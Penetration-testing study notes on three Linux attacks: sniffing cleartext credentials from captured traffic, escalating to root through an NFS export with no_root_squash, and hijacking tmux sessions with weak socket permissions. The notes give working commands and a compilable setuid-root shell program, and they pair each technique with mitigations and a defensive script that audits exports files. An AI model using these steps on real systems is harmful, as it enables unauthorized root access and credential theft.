17. Miscellaneous Techniques

Passive Traffic Capture:

Capture Traffic

sudo tcpdump -i <interface> -w capture.pcap

Analyze Capture with net-creds (if installed)

net-creds capture.pcap

Analyze Capture with PCredz (if installed)

PCredz capture.pcap

Analyze Capture with tshark (part of Wireshark)

tshark -r capture.pcap -T fields -e http.authorization -e ftp.password -e pop.password -e imap.password -e telnet.password -e smtp.password

Analyze Capture with Wireshark (GUI)

wireshark capture.pcap

Weak NFS Privileges:

Show NFS Exports

showmount -e <nfs_server_ip>

View NFS Exports Configuration

cat /etc/exports

Mount NFS Share (requires sudo)

sudo mount -t nfs <nfs_server_ip>:/<export_path> /mnt

Create SUID Binary (C Code Example)

cat > shell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
EOF
gcc shell.c -o shell

Copy SUID Binary to NFS Mount

cp shell /mnt

Set SUID Bit

sudo chmod u+s /mnt/shell

Execute SUID Binary (on Target System)

./shell

Unmount NFS Share (requires sudo)

sudo umount /mnt

Hijacking Tmux Sessions:

Find Running tmux Processes

ps aux | grep tmux

Check tmux Socket Permissions

ls -la <tmux_socket>

Attach to tmux Session

tmux -S <tmux_socket> attach

Create a New Shared tmux Session (example)

tmux -S /shareds new -s debugsess

Change the Ownership of the tmux Socket (example)

sudo chown root:devs /shareds

1. Passive Traffic Capture:

  • Concept:

    • Using tcpdump or similar tools to capture network traffic.

    • Analyzing the captured traffic for sensitive information (credentials, hashes).

  • Vulnerabilities:

    • Cleartext protocols (HTTP, FTP, etc.).

    • Weak encryption.

    • Capture of hashes (Net-NTLMv2, Kerberos).

  • Tools:

    • tcpdump

    • net-creds

    • PCredz

  • Mitigation:

    • Use encrypted protocols (HTTPS, SSH).

    • Implement network segmentation.

    • Restrict access to tcpdump and similar tools.

    • Use tools that prevent cleartext credential transmission.

2. Weak NFS Privileges:

  • Concept:

    • Exploiting misconfigurations in NFS exports.

    • Specifically, the no_root_squash option.

  • Vulnerabilities:

    • no_root_squash allows remote root users to write files as root on the NFS server.

  • Exploitation:

    • Mount the NFS share.

    • Create a SUID root binary.

    • Execute the binary to gain root privileges.

  • Mitigation:

    • Use root_squash (default).

    • Restrict NFS exports.

    • Properly secure the NFS server.

  • Commands:

    • showmount -e <nfs_server_ip>

    • cat /etc/exports

    • mount -t nfs <nfs_server_ip>:/<export_path> /mnt

    • chmod u+s <binary>
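As an added example that is not part of the original notes, the following script audits an exports(5) file for the two mitigation points above: exports with no_root_squash and exports open to any host. The sample exports file is constructed here; point audit_exports at /etc/exports on a real server.

```shell
#!/bin/sh
# Added example (not from the original notes): flag no_root_squash and
# world-open exports in an exports(5) file. Usage: audit_exports /etc/exports

# Print one finding per line: "<path> <host> <reason>".
audit_exports() {
    file=$1
    while IFS= read -r line; do
        # Skip blank lines and comments.
        case "$line" in ''|\#*) continue ;; esac
        # Word-split the line; disable globbing so a "*" host is not expanded.
        set -f; set -- $line; set +f
        path=$1; shift
        [ $# -eq 0 ] && set -- '*'        # no client list at all: open to everyone
        for clause in "$@"; do
            host=${clause%%"("*}          # client spec is the text before "("
            opts=${clause#*"("}           # options are inside the parentheses
            opts=${opts%")"}
            [ "$clause" = "$host" ] && opts=''   # no parentheses: default options
            # exports(5) pitfall: "/srv host (rw)" (space before the parenthesis)
            # applies "(rw)" to every host, not to "host".
            [ -z "$host" ] && host='*'
            case "$host" in
                '*') printf '%s %s unrestricted_host\n' "$path" "$host" ;;
            esac
            case ",$opts," in
                *,no_root_squash,*) printf '%s %s no_root_squash\n' "$path" "$host" ;;
            esac
        done
    done < "$file"
}

# Number of findings; 0 means nothing was flagged.
count_findings() { audit_exports "$1" | wc -l | tr -d ' '; }

# Constructed sample exports file mirroring the exploitable case in the notes.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
# constructed /etc/exports for this example
/srv/backup   *(rw,sync,no_root_squash)
/srv/public   10.0.0.0/24(ro,sync)
/srv/build    10.0.0.5 (rw,no_subtree_check)
/home         10.0.0.0/24(rw,root_squash)
EOF
audit_exports "$SAMPLE"
```

The /srv/build line is flagged even though it names a host, because the stray space hands the (rw) options to the world; that is the kind of line a quick visual check of /etc/exports misses.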

3. Hijacking Tmux Sessions:

  • Concept:

    • Exploiting weak permissions on tmux sessions.

    • Attaching to a root-owned tmux session.

  • Vulnerabilities:

    • World-writable or group-writable tmux sockets.

    • Root-owned tmux sessions.

  • Exploitation:

    • Identify running tmux processes.

    • Check permissions on the tmux socket.

    • Attach to the session.

  • Mitigation:

    • Set restrictive permissions on tmux sockets (never group- or world-writable).

    • Avoid running privileged tmux sessions.

  • Commands:

    • ps aux | grep tmux

    • ls -la <tmux_socket>

    • tmux -S <tmux_socket> attach
